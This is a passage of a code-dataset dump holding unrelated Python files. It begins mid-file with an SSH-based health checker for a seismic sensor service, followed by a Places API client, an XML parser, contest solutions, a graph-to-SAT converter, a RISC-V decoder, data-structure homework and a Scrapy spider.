(cur_data[4].lower().endswith(':16000')) and \\\n (cur_data[5].lower().startswith('users:((\"mseedscan2dali\"')) and \\\n (int(cur_data[2]) <= 10000):\n datalink_connected = True\n\n if datalink_connected:\n logger.info(\"Found a valid mseedscan2dali network connection.\")\n else:\n logger.error(\"No valid mseedscan2dali network connection found.\")\n \n return datalink_connected, response\n\n\ndef check_mss_record_service(ssh, logger):\n ''' Check if mss_record is running.\n '''\n logger.info('Checking the mss_record service.')\n cmd = 'systemctl status mss_record.service'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n response = ssh_stdout.readlines()\n\n mssr_is_running = False\n\n for cur_line in response:\n cur_line = cur_line.strip().lower()\n if cur_line.startswith('active: active (running) '):\n mssr_is_running = True\n break\n\n if mssr_is_running:\n logger.info(\"The mss_record service is running.\")\n else:\n logger.error(\"The mss_record service is not running.\")\n \n return mssr_is_running\n\n\ndef check_datafiles(ssh, logger):\n ''' Check the writing of miniseed data files.\n '''\n logger.info('Checking the miniseed data.')\n cmd = 'ls /home/mss/mseed/*.msd'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n filelist = ssh_stdout.readlines()\n \n data_updated = False\n recent_files = []\n\n if filelist:\n filedate_list = []\n filelist = sorted(filelist)\n for cur_file in filelist:\n filename = os.path.split(cur_file)[-1]\n filename = os.path.splitext(cur_file)[0]\n parts = filename.split('_')\n file_date = obspy.UTCDateTime(parts[-1])\n filedate_list.append(file_date)\n\n latest_date = max(filedate_list)\n now = obspy.UTCDateTime()\n \n if (now - latest_date) <= 60:\n data_updated = True\n \n if not data_updated:\n logger.error('No up-to-date miniseed files found. now: %s; last_file: %s;', now, latest_date)\n\n # Get the most recent files.\n recent_files = sorted(zip(filelist, filedate_list),\n key = lambda x: x[1])\n recent_files = [x[0] for x in recent_files]\n recent_files = recent_files[-3:]\n else:\n logger.error('No data files found in the mseed folder.')\n\n if data_updated:\n logger.info(\"Found up-to-date miniseed data. mss_record is writing data files.\")\n logger.info(\"The latest 3 data files:\\n%s\", ''.join(recent_files))\n else:\n if recent_files:\n logger.error(\"The miniseed data is outdated. mss_record is not writing miniseed data.\")\n logger.info(\"The latest 3 data files:\\n%s\", ''.join(recent_files))\n else:\n logger.error(\"No miniseed data files found.\")\n\n return data_updated, recent_files\n\n\ndef get_version_info(ssh, logger):\n ''' Get version information of MSS software.\n '''\n logger.info(\"Gathering MSS software version information.\")\n version_info = {}\n \n # Get the mss image version.\n cmd = 'cat /etc/mss_image_version'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n version_info['image_version'] = ssh_stdout.readline().strip()\n\n # Get the mss-record package version.\n cmd = 'apt show python-mssrecord'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n for cur_line in ssh_stdout.readlines():\n cur_line = cur_line.lower().strip()\n if cur_line.startswith('version'):\n version_info['python-mssrecord_version'] = cur_line.split(':')[1].strip()\n\n # Get the mss-suite package version.\n cmd = 'apt show mss-suite'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n for cur_line in ssh_stdout.readlines():\n cur_line = cur_line.lower().strip()\n if cur_line.startswith('version'):\n version_info['mss-suite_version'] = cur_line.split(':')[1].strip()\n\n # Get the mss_record version.\n cmd = 'cat /usr/lib/python3/dist-packages/mss_record/version.py'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n version_info['mss_record_git_tag'] = ssh_stdout.readline().split('=')[1].strip().replace('\"', '')\n\n cmd = 'cat /usr/lib/python3/dist-packages/mss_record/__init__.py | grep __version__'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n version_info['mss_record_version'] = ssh_stdout.readline().split('=')[1].strip().replace('\"', '')\n\n return version_info\n\n\ndef get_config_info(ssh, logger):\n ''' Get the mss software configuration.\n '''\n logger.info(\"Gathering MSS software configuration information.\")\n \n config_info = {}\n # Get the dali configuration.\n cmd = 'cat /home/mss/config/dali.ini'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n config_info['dali_config'] = ssh_stdout.readlines()\n \n # Get the configuration file.\n cmd = 'cat /home/mss/config/mss_record.ini'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n config_info['mss_record_config'] = ssh_stdout.readlines()\n\n return config_info\n\n\ndef get_mss_log_tail(ssh, logger, n_lines = 20):\n ''' Get the last entries of the mss_log file.\n '''\n logger.info(\"Getting the latest mss_record log file entries.\")\n\n cmd = 'tail -n {:d} /home/mss/log/mss_record.log'.format(n_lines)\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n log_tail = ssh_stdout.readlines()\n \n return log_tail\n \n","repo_name":"Macroseismic-Sensor-Network/mss_service","sub_path":"lib/mss_service/core/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":9041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30423605686","text":"import json\nimport requests\nimport time\n\nURL = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json\"\n\ndef credentials():\n with open('credentials/credentials.json') as json_file: \n return json.load(json_file)\n\ndef nearby_search(latitude, longitude, radius_m, delay_between_requests=2):\n response_pages = []\n\n PARAMS = {'location': \"{},{}\".format(latitude, longitude), 'key': credentials()[\"api_key\"], 'radius': \"{}\".format(radius_m)}\n r = requests.get(url=URL, params=PARAMS).json()\n response_pages.append(r)\n\n while \"next_page_token\" in r.keys():\n next_page_token = r[\"next_page_token\"]\n\n r = next_page(next_page_token)\n\n while r['status'] == \"INVALID_REQUEST\":\n time.sleep(delay_between_requests)\n r = next_page(next_page_token)\n\n response_pages.append(r)\n \n return response_pages\n\ndef next_page(next_page_token):\n PARAMS = {'key': credentials()[\"api_key\"], \"pagetoken\": next_page_token}\n r = requests.get(url=URL, params=PARAMS).json()\n return r\n\n","repo_name":"talestsp/google_places_request","sub_path":"src/grabber/grabber.py","file_name":"grabber.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2112754559","text":"import xml.dom.minidom as dom\n\n\ndef getText(nodelist):\n rc = []\n for node in nodelist.childNodes:\n if node.nodeType == node.TEXT_NODE:\n rc.append(node.data)\n return ''.join(rc)\n\n\ndef get_node_data(node):\n data = {}\n for nde in node.childNodes:\n if nde.nodeType != nde.ELEMENT_NODE:\n continue\n data[nde.tagName] = getText(nde)\n return data\n\n\ndef get_list_of_data(document, tagname):\n nodes = document.getElementsByTagName(tagname)\n items = []\n for node in nodes:\n items.append(get_node_data(node))\n return items\n\n\ndef liste_notes(document):\n return get_list_of_data(document, \"noteelev\")\n\n\ndef liste_epreuves(document):\n return get_list_of_data(document, \"typeepr\")\n\n\ndef general_data(document):\n tagnames = ['iuense', 'libens', 'codeeetab', 'libeetab', 'codeperiodexam',\n 'libperiodexam', 'codeclass', 'libeclass', 'codematiere', 'libematier',\n 'nbrclass', 'codedre', 'drear', 'nbrEleve', 'codedisc', 'libedisc']\n infos = {}\n for tagname in tagnames:\n infos[tagname] = getText(document.getElementsByTagName(tagname)[0])\n return infos\n\n\ndef parse_nom_classe(nomClasse):\n # ثانية تكنولوجيا الإعلامية 2\n NIVEAUX = {'ثانية': 2, 'ثالثة': 3}\n nc = nomClasse.split()\n data = {\n 'niveau': NIVEAUX[nc[0]],\n 'numOrdre': int(nc[-1]),\n 'section': \" \".join(nc[1:-1]),\n 'nomClasse': nomClasse\n }\n return data\n\n\ndef read_xml_file(xmlfile):\n doc = dom.parse(xmlfile)\n infos = general_data(doc)\n eleves = liste_notes(doc)\n epreuves = liste_epreuves(doc)\n classeInfos = parse_nom_classe(infos['libeclass'])\n return {\n 'generalInfos': infos,\n 'eleves': eleves,\n 'epreuves': epreuves,\n 'classe': classeInfos\n }\n\n\ndef get_noms_eleves(xmlData):\n ELEVES_KEYS = ['IDENELEV', 'prenomnom']\n eleves = [{key: eleve[key] for key in ELEVES_KEYS}\n for eleve in xmlData['eleves']]\n eleves = [eleve for idx, eleve in enumerate(eleves)\n if eleves.index(eleve) == idx]\n return eleves\n","repo_name":"manimanis/3STI-BD","sub_path":"downloads/notes_db/xmledu.py","file_name":"xmledu.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26211756956","text":"import sys \n\ninput = sys.stdin.readline\n\nn = int(input())\n\n\nfor i in range(n):\n flag = False\n instruction = list(input().strip())\n a = input()\n arr = input().strip().split(',')\n \n if len(arr):\n arr[0] = arr[0][1:]\n if len(arr) >= 1:\n arr[-1] = arr[-1][:-1]\n \n if arr[0] == '':\n arr = []\n \n direction = False # True = 역방향\n d = 0\n l = 0\n r = len(arr)-1\n\n for j in instruction:\n if j == 'R':\n direction = not direction\n if j == 'D':\n if not direction:\n l += 1\n else:\n r -= 1\n if l > len(arr) or r < -1 or l > r+1:\n print('error')\n flag=True\n break\n\n if not flag:\n arr = arr[l:r+1]\n \n if not direction:\n print('[', end='')\n for k in range(len(arr)):\n if k == len(arr)-1:\n print(arr[k], end='')\n else:\n print(arr[k], end=',')\n print(']', end='')\n print()\n else:\n print('[', end='')\n for k in range(len(arr)-1, -1, -1):\n if k == 0:\n print(arr[k], end='')\n else:\n print(arr[k], end=',')\n print(']', end='')\n print()\n \n","repo_name":"KUcodemaster/Problem_Solving","sub_path":"boj/5430.py","file_name":"5430.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"588826453","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on FRI July 13 02:43:02 2018\r\n@author: Blend Arifaj blendarifaj\r\n\"\"\"\r\nimport numpy as np\r\n#Ideja e realizimit:\r\n#\r\nclass GrafiNeSat:\r\n emriFile = \"\"\r\n matrica = 0\r\n satFile = 0\r\n numriVariablave = 0\r\n numriNgjyrave = 3\r\n lidhjetVariablave = []\r\n tempArr1=[]\r\n formula=[]\r\n\r\n def __init__(self,_matrica,_emriFile=\"TestFile\"):\r\n self.emriFile = _emriFile+\".cnf\"\r\n self.matrica = _matrica\r\n self.satFile = []\r\n self.numriNgjyrave = 3\r\n self.numriVariablave = np.size(_matrica,1)\r\n #Qdo variabel mund ti kete tri mundesi. Dmth mund te kete ngjyren A B C.\r\n #A - Kuqe\r\n #B - Gjelber\r\n #C - Kalter\r\n self.tempArr1 = []\r\n self.formula = []\r\n \r\n for i in range(1,self.numriVariablave + 1 ,1):\r\n for j in range(self.numriNgjyrave):\r\n self.tempArr1.append(i+2*(i-1)+j) #Zgjidhja eshte bere nga disa kalkulime matematikore \r\n self.formula.append(self.tempArr1)\r\n self.tempArr1=[]\r\n \r\n for i in range(self.numriVariablave):\r\n tempData = self.formula[i]\r\n self.vendosSePakuNjeNgjyre(tempData)\r\n self.mosVendosDyNgjyraNeNjeVend(tempData)\r\n \r\n \r\n self.merrLidhjet(self.matrica)\r\n self.mosVendos()\r\n \r\n self.merrSatFile()\r\n \r\n #Ne qdo Object duhet te vendoset vetem nje ngjyre.\r\n \r\n def vendosSePakuNjeNgjyre(self,pika):\r\n pika.append(0)\r\n self.satFile.append(pika)\r\n \r\n def mosVendosDyNgjyraNeNjeVend(self,pika):\r\n self.satFile.append([-pika[0],-pika[1],0])\r\n self.satFile.append([-pika[0],-pika[2],0])\r\n self.satFile.append([-pika[1],-pika[2],0])\r\n \r\n def merrLidhjet(self,matrica):\r\n for i in range(np.size(matrica,1)):\r\n for j in range(np.size(matrica,1)):\r\n if matrica[i][j] == 1:\r\n if matrica[j][i] == 1:\r\n if([i,j] not in self.lidhjetVariablave and [j,i] not in self.lidhjetVariablave):\r\n self.lidhjetVariablave.append([i,j])\r\n \r\n #Funksioni i cili nuk do te lejoj qe te vendos\r\n def mosVendos(self):\r\n for i in range(len(self.lidhjetVariablave)):\r\n self.mosVendosNgyrenNjejt(self.lidhjetVariablave[i])\r\n \r\n def mosVendosNgyrenNjejt(self,_lidhja):\r\n numri = int(_lidhja[0])\r\n temp1 = self.formula[numri]\r\n numri = int(_lidhja[1])\r\n temp2 = self.formula[numri]\r\n \r\n for i in range (len(temp1)):\r\n self.satFile.append([-temp1[i],-temp2[i],0]) \r\n \r\n def merrSatFile(self):\r\n row = \"c This Formular is generated by me :) \\n\"\r\n row = row +\"c\\n\"\r\n row = row +\"c horn? no\\n\" \r\n row = row +\"c forced? no\\n\" \r\n row = row +\"c mixed sat? no\\n\" \r\n row = row +\"c clause length = 3\\n\" \r\n row = row +\"c\\n\"\r\n row = row +\"p cnf \"+str(self.numriVariablave*self.numriNgjyrave)+\"\\n\"\r\n temp = False\r\n for i in range(len(self.satFile)):\r\n for j in range(len(self.satFile[i])):\r\n if self.satFile[i][0] != 0:\r\n temp = True\r\n row = row + str(self.satFile[i][j])+\" \"\r\n else:\r\n temp = False\r\n continue\r\n if temp:\r\n row = row +\"\\n\"\r\n row = row +\"%\"\r\n \r\n file = open(self.emriFile,\"w\")\r\n file.write(row)\r\n file.close()\r\n \r\n\r\n#Definimi i funksioneve te nevojshme\r\nclass SAT:\r\n formula = []\r\n zgjidhja = []\r\n satFile = []\r\n numriVariablave = 0\r\n def __init__(self,satFile):\r\n #Leximi i sat-file\r\n file = open(satFile,'r')\r\n self.satFile = file.read()\r\n self.satFile = self.satFile.split('\\n')\r\n \r\n \r\n #Gjetja e numrit te variablave\r\n temp = self.satFile[7].split(' ')\r\n numriVariablave = temp[2]\r\n numriVariablave =int(numriVariablave)\r\n\r\n #Gjetja e formules\r\n for rresht in self.satFile: \r\n rreshti=rresht.strip()\r\n list = []\r\n ## Nje rresht duhet te filloj me numer ose me shenje negative (-)\r\n if rreshti[0] == '%':\r\n break\r\n if (rreshti[0].isdigit()) or (rreshti[0].startswith(\"-\")):\r\n anetaretRreshtit = rreshti.split()\r\n for numer in anetaretRreshtit:\r\n try:\r\n numer_int = int(numer)\r\n if numer_int < 0:\r\n list.append( (abs(numer_int), 0) )\r\n elif numer_int > 0: ## Eliminimi i zerove ne fund\r\n list.append( (numer_int, 1) )\r\n except:\r\n print(\"Gabim gjate konvertimit\", rreshti)\r\n self.formula.append(list)\r\n #Mbushja e zgjidhjes me vlera -1\r\n for i in range(numriVariablave):\r\n self.zgjidhja.append(-1)\r\n \r\n if(self.gjeneroZgjidhje()):\r\n print(\"Zgjidhja u caktua : \",self.zgjidhja)\r\n else:\r\n print(\"Zgjidhja nuk mund te caktohet\")\r\n \r\n #Funksioni kontrollo, roli i te cilit eshte me shiku nese variablat e zgjidhjes kane ndonje vlere -1\r\n #Nese ka vlere -1 dmth ende nuk eshte caktuar zgjidhja\r\n def kontrollo(self,x):\r\n for i in range(len(x)):\r\n if x[i]==-1:\r\n return True\r\n return False\r\n \r\n #Funskioni Kontrollo i cili kontrollon nese zgjidhja e gjeneruar e kenaq ekuacionin\r\n def kontrolloZgjidhjen(self):\r\n for i in range(len(self.formula)):\r\n tempArray = self.returnArray(len(self.formula[i]))\r\n for j in range(len(self.formula[i])):\r\n tempArray[j] = self.tempFunction(self.formula[i][j][0],self.formula[i][j][1],self.zgjidhja)\r\n if(self.kontrolloArray(tempArray) == 0):\r\n return False\r\n return True\r\n\r\n #Nje funksion temp i cili ndihmon ne kthimin nga 0 ne 1 \r\n def tempFunction(self,x,y,z):\r\n if(y==1):\r\n return z[x-1]\r\n else:\r\n if(z[x-1]==0):\r\n return 1\r\n else:\r\n return 0\r\n #Funskion i cili krijon nje array me numer te caktuar te variablave\r\n def returnArray(self,nrAnetareve):\r\n array = []\r\n for i in range(nrAnetareve):\r\n array.append(-1)\r\n return array\r\n\r\n #Funksioni i cili e kryen OR logjik ne mes te variablave ne nje array\r\n def kontrolloArray(self,array):\r\n temp = array[0]\r\n for i in range(1,len(array),1):\r\n temp = temp or array[i]\r\n return temp\r\n \r\n #Funksioni i cili gjeneron zgjidhje\r\n def gjeneroZgjidhje(self,n=0,M=2):\r\n if(n==len(self.zgjidhja)):\r\n return True\r\n for i in range(M):\r\n self.zgjidhja[n]=i\r\n if(self.kontrollo(self.zgjidhja)):\r\n if(self.gjeneroZgjidhje(n+1,M)):\r\n return True\r\n else:\r\n if(self.kontrolloZgjidhjen()):\r\n return True\r\n else:\r\n self.zgjidhja[n]=-1\r\n else:\r\n return False\r\n\r\n\r\n#Gjetja e zgjidhjes per nje file te caktuar\r\nmatrix = [[0,0,1,1,1],[0,0,1,1,0],[1,1,0,1,0],[1,1,1,0,1],[1,0,0,1,0]]\r\nemriFile = 'Output.cnf'\r\nobjGrafiNeSat = GrafiNeSat(matrix,emriFile)\r\nobjSat = SAT(emriFile)\r\n","repo_name":"BlendArifaj/GraphColouringProblem","sub_path":"GrafColortoSat.py","file_name":"GrafColortoSat.py","file_ext":"py","file_size_in_byte":7623,"program_lang":"python","lang":"sq","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18959422803","text":"import pyrtl\nfrom enum import IntEnum\n\nfrom .control import ImmType, Opcode\n\n\ndef insert_nop(fn7, rs2, rs1, fn3, rd, op, nop):\n return (\n pyrtl.mux(nop, fn7, pyrtl.Const(0, bitwidth=len(fn7))),\n pyrtl.mux(nop, rs2, pyrtl.Const(0, bitwidth=len(rs2))),\n pyrtl.mux(nop, rs1, pyrtl.Const(0, bitwidth=len(rs1))),\n pyrtl.mux(nop, fn3, pyrtl.Const(0, bitwidth=len(fn3))),\n pyrtl.mux(nop, rd, pyrtl.Const(0, bitwidth=len(rd))),\n pyrtl.mux(nop, op, pyrtl.Const(Opcode.REG, bitwidth=len(op))),\n )\n\n\ndef decode_inst(inst, nop=None):\n \"\"\"Decodes fetched instruction, inserting a nop if a bubble is needed.\n\n :param inst: the input full encoded RISC-V instruction\n :param nop: a control signal indicating if a nop should be inserted\n :return: a tuple containing the components (funct7, rs2, rs1, funct3, rd, opcode)\n \"\"\"\n\n # fetch inst and decode\n fn7, rs2, rs1, fn3, rd, op = pyrtl.chop(inst, 7, 5, 5, 3, 5, 7)\n if nop is None:\n return fn7, rs2, rs1, fn3, rd, op\n else:\n return insert_nop(fn7=fn7, rs2=rs2, rs1=rs1, fn3=fn3, rd=rd, op=op, nop=nop)\n\n\ndef get_immediate(inst, imm_type):\n \"\"\"Takes a RISC-V instruction and returns the sign-exteneded immediate value.\n\n Note that different RISC-V instruction types have different bits used as the immediate.\n Also, for the B type and J type instructions, the values are *already* shifted\n left on the output.\n\n See Volume 1 of the RISC-V Manual, Figures 2.3 and 2.4\n\n :param inst: the input full encoded RISC-V instruction\n :param imm_type: the immediate format of the instruction (R, I, S, etc.)\n :return: the output sign-extended immediate value encoded in the instruction\n \"\"\"\n\n imm = pyrtl.WireVector(bitwidth=32, name=\"inst_imm\")\n imm <<= pyrtl.enum_mux(\n imm_type,\n {\n ImmType.I: inst[20:].sign_extended(32),\n ImmType.S: pyrtl.concat(inst[25:], inst[7:12]).sign_extended(32),\n ImmType.B: pyrtl.concat(\n inst[31], inst[7], inst[25:31], inst[8:12], 0\n ).sign_extended(32),\n ImmType.U: pyrtl.concat(inst[12:], pyrtl.Const(0, bitwidth=12)),\n ImmType.J: pyrtl.concat(\n inst[31], inst[12:20], inst[20], inst[21:31], 0\n ).sign_extended(32),\n },\n default=0,\n )\n\n return imm\n","repo_name":"pllab/BD-PyRTL-RV","sub_path":"src/decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"23377637641","text":"import random\r\n\r\nf = open(\"B-small-attempt4.in\", \"r\")\r\nfout = open(\"out.txt\", \"w\")\r\n\r\ndef out(*args, sep=' ', end='\\n'):\r\n print(*args, sep=sep, end=end)\r\n print(*args, sep=sep, end=end, file=fout)\r\n\r\ndef overlap(x1,y1,d1,x2,y2,d2):\r\n return (d1+d2)**2 > (x1-x2)**2 + (y1-y2)**2\r\n\r\ndef conflict(pos, d, loc):\r\n for l in loc:\r\n if overlap(pos[0],pos[1],d,l[0],l[1],l[2]):\r\n return True\r\n return False\r\n\r\ndef process(T):\r\n [N, W, L] = [int(i) for i in f.readline().rstrip().split(' ')]\r\n rs = [int(i) for i in f.readline().rstrip().split(' ')]\r\n loc = []\r\n for d in rs:\r\n pos = (random.randint(0,W), random.randint(0,L))\r\n while conflict(pos, d, loc):\r\n pos = (random.randint(0,W), random.randint(0,L))\r\n loc.append((pos[0], pos[1], d))\r\n\r\n out(('Case #%d: ' % T) + ' '.join([str(l[0]) + \" \" + str(l[1]) for l in loc]))\r\n\r\nif __name__ == '__main__':\r\n for t in range(1, int(f.readline())+1):\r\n process(t)\r\n\r\nf.close()\r\nfout.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_109/58.py","file_name":"58.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14456583516","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 11 21:35:29 2019\n\n@author: nithish k\n\"\"\"\n\n## pull the first element and then sift down\n\n\"\"\"\n\nQuestion 1\n\"\"\"\n\n\ndef swap(pos1,pos2,listToBeAltered):\n temp = listToBeAltered[pos1]\n listToBeAltered[pos1] = listToBeAltered[pos2]\n listToBeAltered[pos2] = temp\n \n pass\n\n\n\ndef heapify(listToConvert, position):\n ##position form 1\n \n if 2*position+2 < len(listToConvert): ##index in range or there exists a child\n \n initParent = listToConvert[position] ##pos\n leftChild = listToConvert[2*position+1] ##2*pos\n rightChild = listToConvert[2*position+2] ## 2*pos+1\n newPosition = position\n \n if leftChild > initParent and leftChild >rightChild: ##left child is the greatest\n swap(2*position+1,position,listToConvert) ##swap parent with right\n newPosition = 2*position+1\n \n \n elif rightChild > initParent and rightChild > leftChild: ##right child is the greatest\n swap(2*position+2,position,listToConvert) ##swap parent with right\n newPosition = 2*position+2\n \n if newPosition != position:\n print(listToConvert)\n \n heapify(listToConvert, newPosition)\n \n \n pass\n\n\ndef extractMax(heapedList):\n maxElem = heapedList[0]\n heapedList[0] = heapedList[-1] \n del heapedList[-1] \n heapify(heapedList,0)\n \n return maxElem\n\ndef buildMaxHeap(listToConvert):\n ##from last but one layer of nodes do heapify\n lastPosition = len(listToConvert)-1\n \n for i in range(int(lastPosition/2 -1),0,-1):\n heapify(listToConvert,i)\n\nmyList = [15, 5, 9,13, 12, 8, 7, 4, 0, 6, 2, 1]\n\n\nextractMax(myList)\n\n\n\"\"\"\n[13, 1, 9, 5, 12, 8, 7, 4, 0, 6, 2]\n[13, 12, 9, 5, 1, 8, 7, 4, 0, 6, 2]\n[13, 12, 9, 5, 6, 8, 7, 4, 0, 1, 2]\n\n\"\"\"\n\n\n\n\"\"\"\nQuestion 2\n\"\"\"\n\n\n\n\ndef mergeWithoutDuplicates(leftList, rightList):\n mergedList = []\n leftLen = len(leftList)\n rightLen = len(rightList)\n i = j = 0\n \n while(i < leftLen and j < rightLen):\n \n if (leftList[i] < rightList[j]):\n \n mergedList.append(leftList[i])\n \n \n i+=1\n \n elif (leftList[i] > rightList[j]):\n mergedList.append(rightList[j])\n \n j +=1\n \n \n elif (leftList[i] == rightList[j]):\n mergedList.append(rightList[j])\n i+=1\n j+=1\n\n while(i < leftLen):\n mergedList.append(leftList[i])\n \n i+=1\n \n while(j < rightLen):\n \n mergedList.append(rightList[j])\n \n j+=1\n \n \n return mergedList\n\n\ndef removeDuplicates(inpList):\n n = len(inpList)\n if (n <= 1):\n return inpList\n mid = int(n/2)\n leftList = removeDuplicates(inpList[0:mid])\n rightList = removeDuplicates(inpList[mid:])\n return mergeWithoutDuplicates(leftList, rightList)\n\n\n \nmylist = [1,2,3,4,6,4]\n\nremoveDuplicates(mylist)\n\n\n\"\"\"\nQuestion 7\n\"\"\"\nclass linkedList():\n \n def __init__(self, value):\n \n self.value = value\n self.next = None\n pass\n def setNext(self,Obj):\n self.next = Obj\n def setValue(self,value):\n self.value = value\n def getNext(self):\n \n return self.next\n \n def getValue(self):\n return self.value\n \n \nclass hashTable():\n \n def __init__(self):\n self.HashTable = None\n self.size = None\n def createHashTable(self,size):\n self.HashTable = [None for i in range(size)]\n self.size = size\n \n def getHashVal(self,key):\n return key % self.size\n \n def insertToTable(self,key):\n indexInhash = self.getHashVal(key)\n \n if indexInhash < self.size:\n if self.HashTable[indexInhash] is None:\n \n self.HashTable[indexInhash] = linkedList(key) \n \n else:\n nextLinkedList = self.HashTable[indexInhash]\n while True:\n \n if nextLinkedList.getNext() is None:\n nextLinkedList.setNext(linkedList(key))\n break\n else:\n \n nextLinkedList = nextLinkedList.getNext()\n \n\n \n def checkKey(self,key):\n indexInhash = self.getHashVal(key)\n if indexInhash < self.size:\n \n if self.HashTable[indexInhash] is None:\n \n return False \n \n else:\n nextLinkedList = self.HashTable[indexInhash]\n \n while True:\n value = nextLinkedList.getValue()\n \n if value == key:\n return True\n break\n elif nextLinkedList.getNext() is None:\n return False\n break\n \n else:\n \n nextLinkedList = nextLinkedList.getNext()\n \n\nmyHashTable = hashTable()\nmyHashTable.createHashTable(9)\nfor i in [5, 28, 19, 15, 20, 33, 12, 17, 10]:\n myHashTable.insertToTable(i) \n \nmyHashTable.HashTable\n\nmyHashTable.checkKey(6)\n\nfor i in [5, 28, 19, 15, 20, 33, 12, 17, 10]:\n print(i%9)\n\n\n\n\n\"\"\"\nQuestion 10\n\"\"\"\nclass binaryNode():\n \n def __init__(self,value = None):\n self._value = value\n self._left = None\n self._right = None\n self._parent = None\n \n def insert(self,insertValue):\n self._value = insertValue\n \n def getValue(self):\n return self._value \n \n def getLeft(self):\n return self._left\n \n def setLeft(self,Node):\n self._left = Node\n \n def getRight(self):\n \n return self._right\n \n def setRight(self,Node):\n self._right = Node\n \n \nclass binaryTree():\n \n def __init__(self):\n self.root = None\n \n \n def insertInTree(self,insertValue):\n \n node = binaryNode(insertValue)\n if self.root is None:\n self.root = node\n \n else :\n currentNode = self.root \n while True:\n \n if insertValue < currentNode.getValue():\n if currentNode.getLeft() is None:\n currentNode.setLeft(node)\n break\n \n else:\n currentNode = currentNode.getLeft()\n \n \n elif insertValue > currentNode.getValue():\n \n if currentNode.getRight() is None:\n currentNode.setRight(node)\n break\n else:\n currentNode = currentNode.getRight()\n \n def walkInorder(self,currentNode):\n if currentNode is not None:\n self.walkInorder(currentNode.getLeft())\n print(currentNode.getValue())\n self.walkInorder(currentNode.getRight())\n \n \n \n \n \n\nmyTree = binaryTree()\nfor i in range(10):\n myTree.insertInTree(i)\n \nmyTree.walkInorder(myTree.root)\n \n \n \n\"\"\"\nQuestion 5\n\"\"\"\n\nlistOfBits = [0,0,0,0,0,0,0,0]\nIndex = 0\ndef incrementalCounter(listOfBits):\n global Index\n \n i = 0\n \n while i < len(listOfBits) and listOfBits[i] == 1:\n listOfBits[i] = 0\n i += 1\n if i < len(listOfBits):\n listOfBits[i] = 1\n Index = i \n \ndef resetIndex(listOfBits):\n \n for j in range(Index+1):\n listOfBits[j] = 0\n \n pass\n\nincrementalCounter(listOfBits)\n\nresetIndex(listOfBits)\n","repo_name":"srinithish/Applied-Algorithms","sub_path":"Assignments/Assignment_2.py","file_name":"Assignment_2.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11793122926","text":"import scrapy\nfrom mymovie.items import MymovieItem\n\n# list타입의 descs가 param & list 형태로 반환\n# descs : 40개의 데이터 (공백포함) -> 10개의 데이터 (공백제거) \ndef remove_space(descs:list) -> list:\n result=[]\n for i in range(len(descs)) :\n if len(descs[i].strip()) > 0:\n result.append(descs[i].strip()) \n return result\n\nclass MymovieBotsSpider(scrapy.Spider):\n name = 'mymovie_bots'\n allowed_domains = ['naver.com']\n start_urls = ['http://movie.naver.com/movie/point/af/list.nhn']\n\n def parse(self, response):\n titles = response.xpath('//*[@id=\"old_content\"]/table/tbody/tr/td[2]/a[1]/text()').extract()\n stars = response.xpath('//*[@id=\"old_content\"]/table/tbody/tr/td[2]/div/em/text()').extract()\n descs = response.xpath('//*[@id=\"old_content\"]/table/tbody/tr/td[2]/text()').extract()\n converted_descs = remove_space(descs)\n\n writers = response.css('.author::text').extract()\n dates = response.xpath('//*[@id=\"old_content\"]/table/tbody/tr/td[3]/text()').extract()\n\n for row in zip (titles, stars, converted_descs, writers, dates) :\n item = MymovieItem()\n item['title'] = row[0]\n item['star'] = row[1]\n item['desc'] = row[2]\n item['writer'] = row[3]\n item['date'] = row[4]\n\n yield item # return과 기능은 동일하나, generator도 포함\n\n # items = []\n # for idx in range(len(titles)):\n # item = MymovieItem()\n # item['title'] = titles[idx]\n # item['star'] = stars[idx]\n # item['desc'] = converted_descs[idx]\n # item['writer'] = writers[idx]\n # item['date'] = dates[idx]\n\n # items.append(item)\n # return items","repo_name":"mementohaeri/TIL","sub_path":"web_scrapnig/scrapy/mymovie/mymovie/spiders/mymovie_bots.py","file_name":"mymovie_bots.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
